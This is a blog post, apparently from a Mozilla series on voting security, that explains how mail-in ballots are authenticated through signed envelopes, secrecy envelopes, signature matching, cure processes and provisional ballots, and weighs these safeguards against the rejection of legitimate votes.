As mentioned above, counting mail-in ballots is the same as counting in-person ballots. In fact, in many cases jurisdictions will use the same ballots in each case, so they can just hand count them or run them through the same optical scanner as they would with in-person voted ballots, which simplifies logistics considerably. The major difference between in-person and mail-in voting is the need for different mechanisms to ensure that only authorized voters vote (and that they only vote once). In an in-person system, this is ensured by determining eligibility when voters enter the polling place and then giving each voter a single ballot, but this obviously doesn’t work in the case of mailed-in ballots — it’s way too easy for an attacker to make a pile of fake ballots and just mail them in — so something else is needed.

Authenticating Ballots

As with in-person voting, the basic idea behind securing mail-in ballots is to tie each ballot to a specific registered voter and ensure that every voter votes once.

If we didn’t care about the secrecy of the ballot, the easy solution would be to give every voter a unique identifier (Operationally, it’s somewhat easier to instead give each ballot a unique serial number and then keep a record of which serial numbers correspond to each voter, but these are largely equivalent). Then when the ballots come in, we check that (1) the voter exists and (2) the voter hasn’t voted already. When put together, these checks make it very difficult for an attacker to make their own ballots: if they use non-existent serial numbers, then the ballots will be rejected, and if they use serial numbers that correspond to some other voter’s ballot then they risk being caught if that voter voted. So, from a security perspective, this works reasonably well, but it’s a privacy disaster because it permanently associates a voter’s identity with the contents of their ballots: anyone who has access to the serial number database and the ballots can determine how individual voters voted.

The solution turns out to be to authenticate the envelopes not the ballots. The way that this works is that each voter is sent a non-unique ballot (i.e., one without a serial number) and then an envelope with a unique serial number. The voter marks their ballot, puts it in the envelope and mails it back. Back at election headquarters, election officials perform the two checks described above. If they fail, then the envelope is sent aside for further processing. If they succeed, then the envelope is emptied — checking that it only contains one ballot — and put into the pile for counting.

This procedure provides some level of privacy protection: there’s no single piece of paper that has both the voter’s identity and their vote, which is good, but at the time when election officials open the ballot they can see both the voter’s identity and the ballot, which is bad. With some procedural safeguards it’s hard to mount a large scale privacy violation: you’re going to be opening a lot of ballots very quickly and so keeping track of a lot of people is impractical, but an official could, for instance, notice a particular person’s name and see how they voted.1 Some jurisdictions address this with a two envelope system: the voter marks their ballot and puts it in an unmarked “secrecy envelope” which then goes into the marked envelope that has their identity on it. At election headquarters officials check the outer envelope, then open it and put the sealed secrecy envelope in the pile for counting. Later, all of the secrecy envelopes are opened and counted; this procedure breaks the connection between the user’s identity and their ballot.2

Signature Matching

The basic idea behind the system described above is to match ballots mailed out (which are tied to voter registration) to ballots mailed in. This works as long as there’s no opportunity for attackers to substitute their own ballots for those of a legitimate voter. There are a number of ways that might happen, including:

  • Stealing the ballot in the mail, either on the way out to the voter or when it is sent back to election headquarters. Stealing the ballot on the way back works a lot better because if voters don’t receive their ballots they might ask for another one, in which case you have duplicates.
  • Inserting fake ballots for people who you don’t expect to vote. This is obviously somewhat risky, as they might decide to vote and then you would have a duplicate, but many people vote infrequently and therefore have a reduced risk of creating a duplicate ballot.

Again, I’m assuming that the attacker can make their own ballots and envelopes. This isn’t trivial, but neither is it impossible, especially for a state-level actor.

Some jurisdictions attempt to address this form of attack by requiring voters to sign their ballot envelopes. Those envelopes can then be compared to the voter’s known signature (for instance on their voter registration card). Some jurisdictions even require a witness to sign the ballot too — affirming the identity of the person signing the ballot, to include a copy of their ID, or even to have the ballot envelope notarized. The requirements vary radically between jurisdictions (see here for a table of how this works in each state). To the best of my knowledge, there’s no real evidence that this kind of signature validation provides significantly more defense against fraud. From an analytic perspective, the level of protection depends on the capabilities of an attacker and the detection methods used by election officials. For instance, an attacker who steals your ballot on the way back could potentially try to duplicate your signature (after all, it’s on the envelope!), which seems reasonably likely to work, but an attacker who is just trying to impersonate people who didn’t vote might have some trouble because they wouldn’t know what your signature looked like.

Ballots with Errors

It’s not uncommon for the returned ballots to have some kind of error, for instance:

  • Voter used their own envelope instead of the official envelope
  • Voter didn’t use the secrecy envelope
  • Voter didn’t sign the envelope
  • Voter signature doesn’t match
  • Envelope not notarized.
  • Overvotes
  • Damaged ballots (torn ballots, ballots with stains, etc.)

Each of these can potentially lead to a voter’s ballot being rejected. Moreover, the more requirements a voter’s ballot has to meet, the greater chance that it will be rejected, so there is a need to balance the additional security and privacy provided by extra requirements against the additional risk of rejecting ballots which are actually legitimate, but just nonconformant. Different jurisdictions have made different tradeoffs here.

Just because a ballot has a problem doesn’t mean that the voter is necessarily out of luck: some jurisdictions have what’s called a cure process in which the election officials reach out to the voter whose name is on the ballot and offer them an opportunity to fix their ballot, with the fix depending on the jurisdiction and the precise problem. Some jurisdictions just discard the ballot, for example in the case of “naked ballots” — ballots where voters did not use the inner secrecy envelope.

Of course, not all problems can be cured. In particular, once the ballot has been disassociated from the envelope, then there’s no way to go back to the voter and get them to fix an error such as an overvote. This issue isn’t unique to vote-by-mail, however: it also occurs with voting systems using central-count optical scanners (see Part III). In general, if the ballots are anonymized before processing, then it’s not really possible to fix any errors in them; you just need to process them the best you can.

Ballot rejection is an opportunity for some level of insider attack: although voting officials do not know how individuals voted, they might be able to know which voters are likely to vote a certain way, perhaps by looking at their address or party affiliation (this is easier if the voter’s name is on the ballot, not just a serial number) and more strictly enforce whatever security checks are required for ballots they think will go the wrong way. Having external observers who are able to ensure uniform standards can significantly reduce the risk here.

Voting Twice

There are a number of situations in which multiple ballots might have been or will be cast for the same voter. A number of these are legitimate, such as a voter changing their mind after they voted by mail and deciding to vote in person — perhaps because they changed their mind about candidates or because they are worried their absentee ballot will not be processed in time — but of course they could also be the result of error or fraud. There are two basic ways in which double voting shows up:

  • Two mail-in ballots
  • One mail-in ballot and one in-person ballot

In the case of two mail-in ballots, it’s most likely that the first ballot has already been taken out of the envelope, so there’s no real way not to count it. All you can do is not count the second ballot. Note that this means that if an attacker manages to successfully submit a ballot for you and gets it in before you, then their vote will count and yours will not. Fortunately, this kind of fraud is rare and detectable and once detected can be investigated. I’m not aware of any election where fake mail-in ballots have materially impacted the results.

The more complicated case is when a voter has had a mail-in ballot sent to them but then decides to vote in person, which can happen for a number of reasons. For instance, the ballot might have been lost in the mail (in either direction). This situation is different because we need to prevent double voting but poll workers don’t know whether the voter also submitted their ballot by mail. If the voter is allowed to vote as usual, you might have a situation in which case the mail-in ballot had already been processed (at least as far as removing it from the envelope) and there was no way to remove either ballot, because they’re both unidentified ballots mixed with other ballots. Instead, the standard process is to require the voter to fill in what’s called a provisional ballot, which is physically like a mail-in ballot except that it has a statement about what happened. Provisional ballots are segregated from regular ballots, so once the rest of the ballots have been processed you can go through the provisionals and process those for voters whose ordinary mail-in ballots have not been received/counted.3

Returned Ballot Theft

Another new source of attack on mail-in ballots — as well as ballot drop-boxes — is theft of the ballots en route to election headquarters. In-person voting has a number of accounting mechanisms designed to ensure that the number of voters matches the number of cast ballots which then matches the number of recorded votes, but these don’t work for mail-in ballots because many people who are sent ballots will fail to return them. In many jurisdictions, voters are able to track their ballots and see if they have been processed, and could cast them in person if they are lost. However, as a practical matter, many voters will not do this. The major defense against this kind of attack is good processes around mail deliver and drop-box security as well as post-hoc investigation of reports of missing ballots.

Secrecy of the Ballot

With proper processes at election headquarters, the ballot secrecy properties of mail-in ballots are comparable to in person voting, with one major exception: with mail-in ballots it is much easier for a voter to demonstrate to a third party how they voted. All they have to do is give the ballot to that third party and let them fill it out and mail it (perhaps signing the envelope first). This allows for vote buying/coercion type attacks. This isn’t ideal, but it’s a difficult attack to mount at a large scale because the attacker needs to physically engage with each voter.

The cost of security

As noted above, many states have fairly extensive verification mechanisms for mail-in ballots. These mechanisms are not free, either to voters or election officials. In particular, requirements such as notarization increase the cost of voting and thus may deter some voters from voting. Even apparently lightweight requirements such as signature matching have the potential to cause valid ballots to be rejected: some people will forget to sign their name and people do not sign their name the same way every time and election officials are not experts on handwriting, so we should expect that they will reject some number of valid ballots. Cottrell, Herron and Smith report about 1% of ballots being rejected for some kind of signature issue, with Black and Hispanic voters seemingly having higher rates of rejection than White voters. Because real fraud is rare and errors are common, the vast majority of rejected ballots will actually be legitimate.4

There is a more general point here: although mail-in ballots seem insecure (and this has been a point of concern in the voting security community) real studies of mail-in ballots show that they have extremely low fraud rates. This means that policy makers have to weigh potential security issues with mail-in voting against their impact on legitimate voters. The current evidence suggests that mail-in voting modestly increases voting rates (experience from Oregon suggest by about 2-5 percentage points).5 The implication is that making mail-in voting more difficult — whether by restricting it or by adding hard-to-follow security requirements — is likely to decrease the number of accepted ballots while only having a small impact on voting fraud.

Up Next: Direct Recording Electronic systems and Ballot Marking Devices

OK. Three posts on paper ballots seems like enough for now, so it’s time to turn to more computerized voting methods. The other major form of voting in the United States uses what’s called the “Direct Recording Electronic” (DRE) voting system which just means that you vote directly on a computer which internally keeps track of the votes. DRE machines are very popular but have been the focus of a lot of concern from a security perspective. We’ll be covering them next, along with a similar seeming but much better system called a “Ballot Marking Device” (BMD). BMDs are like DREs but they print out paper ballots that can then be counted either by hand or with optical scanners.


  1. In this version, the ballots can just have numbers and not names, but as we’ll see below, many jurisdictions require names. ↩
  2. People familiar with computer privacy will recognize this technique from technologies such as proxies, VPNs, or mixnets. ↩
  3. Provisional ballots are also used for a number of other exception cases such as voters who go to the wrong polling place (here again, it’s hard to tell if they tried to vote at multiple polling places) or voters who claim to be registered but can’t be found on the voters list (this often looks the same to precinct-level officials because each precinct usually just has their own list of voters). ↩
  4. This dynamic is quite common when adding new security checks: any check you add will generally have false positives. In environments where most behavior is innocent, that means that most of the behavior you catch will also be innocent people Bruce Schneier has written extensively about this point. ↩
  5. While mail-in voting generally seems to increase turnout by reducing barriers to voting, there are a number of populations that find mail-in ballots difficult. One obvious example is people with disabilities, who may find filling in paper ballots difficult. Less well-known is that Native Americans experience special challenges that make exclusive vote-by-mail difficult. Thanks to Joseph Lorenzo Hall for informing me on this point. ↩

The post Why getting voting right is hard, Part IV: Absentee Voting and Vote By Mail appeared first on The Mozilla Blog.

]]>